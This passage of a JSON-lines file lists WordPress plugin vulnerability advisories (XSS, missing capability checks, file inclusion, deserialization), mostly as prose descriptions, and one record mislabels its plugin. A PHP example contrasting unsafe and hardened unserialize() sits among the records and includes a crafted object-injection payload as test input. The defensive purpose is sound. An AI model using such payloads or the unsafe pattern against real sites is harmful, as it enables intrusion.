version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6fcd334-4d9a-4c11-ab11-b96cdda698c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6fcd334-4d9a-4c11-ab11-b96cdda698c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/settings\\\/chatbot-settings-support.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/settings\\\/chatbot-settings-support.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10531","slug":"chatbot-chatgpt","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_assistant() function in all versions up to, and including, 2.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to update GTP assistants.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc083470-3b43-42f3-8979-7fa6cce6ee75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc083470-3b43-42f3-8979-7fa6cce6ee75?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10530","slug":"chatbot-chatgpt","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the add_new_assistant() function in all versions up to, and including, 2.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to create new GTP assistants.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4fd7e76-4d8b-4e4d-9ae9-c7f9933f8324?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4fd7e76-4d8b-4e4d-9ae9-c7f9933f8324?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L596\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L596\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10529","slug":"chatbot-chatgpt","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The Kognetiks Chatbot for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_assistant() function in all versions up to, and including, 2.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete GTP assistants.","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6b302c9-a6b9-4a91-acb5-2ad270817606?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6b302c9-a6b9-4a91-acb5-2ad270817606?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php#L575\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183413\\\/chatbot-chatgpt\\\/trunk\\\/includes\\\/utilities\\\/chatbot-assistants.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4289","slug":"shortcode-gallery-for-matterport-showcase","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"The WP Matterport Shortcode WordPress plugin before 2.1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38c337c6-048f-4009-aef8-29c18afa6fdc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/38c337c6-048f-4009-aef8-29c18afa6fdc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51406","slug":"fastdup","versionImpact":"2.1.7","versionEndExcluding":"2.1.8","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Ninja Team FastDup \u2013 Fastest WordPress Migration & Duplicator.This issue affects FastDup \u2013 Fastest WordPress Migration & Duplicator: from n\/a through 2.1.7.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fastdup\\\/wordpress-fastdup-plugin-2-1-7-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fastdup\\\/wordpress-fastdup-plugin-2-1-7-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4599","slug":"email-encoder-bundle","versionEndExcluding":"2.1.8","description":"The Slimstat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'eeb_mailto' shortcode in versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.1.7\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.1.7\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2958823\\\/email-encoder-bundle#file60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2958823\\\/email-encoder-bundle#file60\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e90f04e4-eb4c-4822-89c6-79f553987c37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e90f04e4-eb4c-4822-89c6-79f553987c37?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4753","slug":"print-o-matic","versionEndExcluding":"2.1.8","description":"The Print-O-Matic WordPress plugin before 2.1.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d72ec1f-5379-4d8e-850c-afe8b41bb126\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d72ec1f-5379-4d8e-850c-afe8b41bb126\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0543","slug":"bft-autoresponder","versionEndExcluding":"2.1.7.2","description":"The Arigato Autoresponder and Newsletter WordPress plugin before 2.1.7.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3771938-40b5-4e8b-bb5a-847131a2b4a7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3771938-40b5-4e8b-bb5a-847131a2b4a7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7950","slug":"wp-job-portal","versionImpact":"2.1.6","versionEndExcluding":"2.1.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Local File Inclusion, Arbitrary Settings Update, and User Creation in all versions up to, and including, 2.1.6 via several functions called by the 'checkFormRequest' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. Attackers can also update arbitrary settings and create user accounts even when registration is disabled, leading to user creation with a default role of Administrator.","recommendation":"Update to version 2.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1d5275-3398-47a7-889b-4050ebe635ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca1d5275-3398-47a7-889b-4050ebe635ee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/formhandler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/formhandler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/includer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/includer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/i
ncludes\\\/wpjobportal-hooks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/includes\\\/wpjobportal-hooks.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/configuration\\\/controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/configuration\\\/controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/user\\\/controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/user\\\/controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/user\\\/tmpl\\\/views\\\/frontend\\\/form-field.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-job-portal\\\/tags\\\/2.1.5\\\/modules\\\/user\\\/tmpl\\\/views\\\/frontend\\\/form-field.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138675\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138675\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4395","slug":"membership-for-woocommerce","versionEndExcluding":"2.1.7","description":"The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80407ac4-8ce3-4df7-9c41-007b69045c40\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80407ac4-8ce3-4df7-9c41-007b69045c40\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9641","slug":"luckywp-table-of-contents","versionImpact":"2.1.6","versionEndExcluding":"2.1.7","description":"The LuckyWP Table of Contents WordPress plugin before 2.1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81aa922a-3b51-4cfe-9098-53234827610c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81aa922a-3b51-4cfe-9098-53234827610c\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81aa922a-3b51-4cfe-9098-53234827610c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81aa922a-3b51-4cfe-9098-53234827610c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11780","slug":"site-search-360","versionImpact":"2.1.6","versionEndExcluding":"2.1.7","description":"The Site Search 360 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ss360-resultblock' shortcode in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232517%40site-search-360&new=3232517%40site-search-360&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232517%40site-search-360&new=3232517%40site-search-360&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af66bb2-febe-4022-9526-39b1ecd8b01d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af66bb2-febe-4022-9526-39b1ecd8b01d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4669","slug":"events-addon-for-elementor","versionImpact":"2.1.4","versionEndExcluding":"2.1.7","description":"The Events Addon for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Basic Slider, Upcoming Events, and Schedule widgets in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0467548-f1eb-4ea2-9913-4b7ffeb6e91a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0467548-f1eb-4ea2-9913-4b7ffeb6e91a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-slider.php#L1403\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/basic\\\/nabasic-slider.php#L1403\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/event-unique\\\/naevents-unique-upcoming.php#L1287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/event-unique\\\/naevents-unique-upcoming.php#L1287\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/event-unique\\\/naevents-unique-schedule.php#L1267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-addon-for-elementor\\\/trunk\\\/elementor\\\/widgets\\\/event-unique\\\/naevents-unique-schedule.php#L1267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100271\\\/#file378\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100271\\\/#file378\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4314","slug":"wpdatatables","versionEndExcluding":"2.1.66","description":"The wpDataTables WordPress plugin before 2.1.66 does not validate the \"Serialized PHP array\" input data before deserializing the data. This allows admins to deserialize arbitrary data which may lead to remote code execution if a suitable gadget chain is present on the server. This is impactful in environments where admin users should not be allowed to execute arbitrary code, such as multisite.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ab192d7-72ac-4f12-8a51-f28ee4db91bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ab192d7-72ac-4f12-8a51-f28ee4db91bc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
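The wpDataTables record above describes the standard PHP `unserialize()` failure: attacker-shaped serialized input lets PHP instantiate any loaded class and run its magic methods, and a gadget chain on the server turns that into code execution. The block below is an added example, not wpDataTables' code or Security Ninja's; the import handler and its function names are hypothetical. It places the unsafe call beside a form that disables class instantiation with `allowed_classes` and then refuses anything that is not an array of scalars. It runs under plain PHP 7.0 or later with no WordPress loaded.

```php
<?php
// Added example (hypothetical import handler; not wpDataTables' code).
// Runs with plain PHP >= 7.0, no WordPress needed.

// Unsafe shape: unserialize() of attacker-controlled input instantiates any
// loaded class and runs its __wakeup()/__destruct(), which is what turns
// "deserialize arbitrary data" into code execution when a gadget chain exists.
function import_table_rows_unsafe(string $raw): array {
    $data = unserialize($raw);           // arbitrary object graph
    return is_array($data) ? $data : [];
}

// Hardened shape. allowed_classes => false turns every object in the payload
// into __PHP_Incomplete_Class, so no constructor, magic method or gadget runs;
// the result is then restricted to an array of scalars so incomplete objects
// cannot travel further into the application either.
function import_table_rows_safe(string $raw): array {
    if (strlen($raw) > 1024 * 1024) {     // bound the input before parsing it
        throw new InvalidArgumentException('serialized payload too large');
    }
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data)) {
        throw new InvalidArgumentException('expected a serialized PHP array');
    }
    array_walk_recursive($data, function ($value) {
        // is_object() is true for __PHP_Incomplete_Class since PHP 7.2; the
        // instanceof test keeps the check correct on older interpreters.
        if (is_object($value) || $value instanceof __PHP_Incomplete_Class) {
            throw new InvalidArgumentException('objects are not allowed in table data');
        }
    });
    return $data;
}

// Constructed inputs: a benign array and one smuggling an object inside it.
$benign  = serialize([['id' => 1, 'name' => 'Alice'], ['id' => 2, 'name' => 'Bob']]);
$hostile = 'a:1:{i:0;O:8:"stdClass":1:{s:3:"cmd";s:2:"id";}}';

foreach ([$benign, $hostile] as $payload) {
    try {
        $rows = import_table_rows_safe($payload);
        echo 'accepted ', count($rows), " row(s)\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The record's multisite remark is the reason the check matters even for administrators: on a network, a site admin is not supposed to be able to run code on the host, and `allowed_classes => false` is what removes that path. Where the format is under your control, JSON with `json_decode($raw, true)` avoids the object question entirely.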
{"CVE_ID":"CVE-2025-1123","slug":"wp-smtp","versionImpact":"2.1.5","versionEndExcluding":"2.1.6","description":"The Solid Mail \u2013 SMTP email and logging made by SolidWP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email Name, Subject, and Body in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283671\\\/wp-smtp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283671\\\/wp-smtp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f99a918d-53c1-46bd-8e55-9ba77a92efe8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f99a918d-53c1-46bd-8e55-9ba77a92efe8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10897","slug":"tutor-lms-elementor-addons","versionImpact":"2.1.5","versionEndExcluding":"2.1.6","description":"The Tutor LMS Elementor Addons plugin for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check on the install_etlms_dependency_plugin() function in all versions up to, and including, 2.1.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install Elementor or Tutor LMS. Please note the impact of this issue is incredibly limited due to the fact that these two plugins will likely already be installed as a dependency of the plugin.","recommendation":"Update to version 2.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99edd858-5e2c-4cc5-adda-d8e70ddc86f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99edd858-5e2c-4cc5-adda-d8e70ddc86f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-elementor-addons\\\/trunk\\\/classes\\\/Installer.php#L152\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-elementor-addons\\\/trunk\\\/classes\\\/Installer.php#L152\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186320\\\/tutor-lms-elementor-addons\\\/trunk\\\/classes\\\/Installer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186320\\\/tutor-lms-elementor-addons\\\/trunk\\\/classes\\\/Installer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12370","slug":"wp-hotel-booking","versionImpact":"2.1.5","versionEndExcluding":"2.1.6","description":"The WP Hotel Booking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check when adding rooms in all versions up to, and including, 2.1.5. This makes it possible for unauthenticated attackers to add rooms with custom prices.","recommendation":"Update to version 2.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210798%40wp-hotel-booking%2Ftags%2F2.1.5&new=3214765%40wp-hotel-booking%2Ftags%2F2.1.6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210798%40wp-hotel-booking%2Ftags%2F2.1.5&new=3214765%40wp-hotel-booking%2Ftags%2F2.1.6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5df32365-5381-48e0-9313-7e83c4c6c440?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5df32365-5381-48e0-9313-7e83c4c6c440?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4290","slug":"shortcode-gallery-for-matterport-showcase","versionImpact":"2.1.5","versionEndExcluding":"2.1.6","description":"The WP Matterport Shortcode WordPress plugin before 2.1.7 does not escape the PHP_SELF server variable when outputting it in attributes, leading to Reflected Cross-Site Scripting issues which could be used against high privilege users such as admin","recommendation":"Update to version 2.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fad5245-a089-4ba3-9958-1e2c3d066eea\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5fad5245-a089-4ba3-9958-1e2c3d066eea\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6283","slug":"dethemekit-for-elementor","versionImpact":"2.1.5","versionEndExcluding":"2.1.6","description":"The DethemeKit For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL parameter of the De Gallery widget in all versions up to and including 2.1.5 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user clicks on the injected link.","recommendation":"Update to version 2.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b2083f9-79d0-43f6-b7ae-a5817dc561b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b2083f9-79d0-43f6-b7ae-a5817dc561b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php#L2565\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php#L2565\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php#L2900\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/widgets\\\/dethemekit-grid.php#L2900\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1905","slug":"wp-popups-lite","versionEndExcluding":"2.1.5.1","description":"The WP Popups WordPress plugin before 2.1.5.1 does not properly escape the href attribute of its spu-facebook-page shortcode before outputting it back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. This is due to an insufficient fix of CVE-2023-24003","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6ac3e15-6f39-4514-a50d-cca7b9457736\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6ac3e15-6f39-4514-a50d-cca7b9457736\",\"refsource\":\"MISC\",\"tags\":[]}]"}
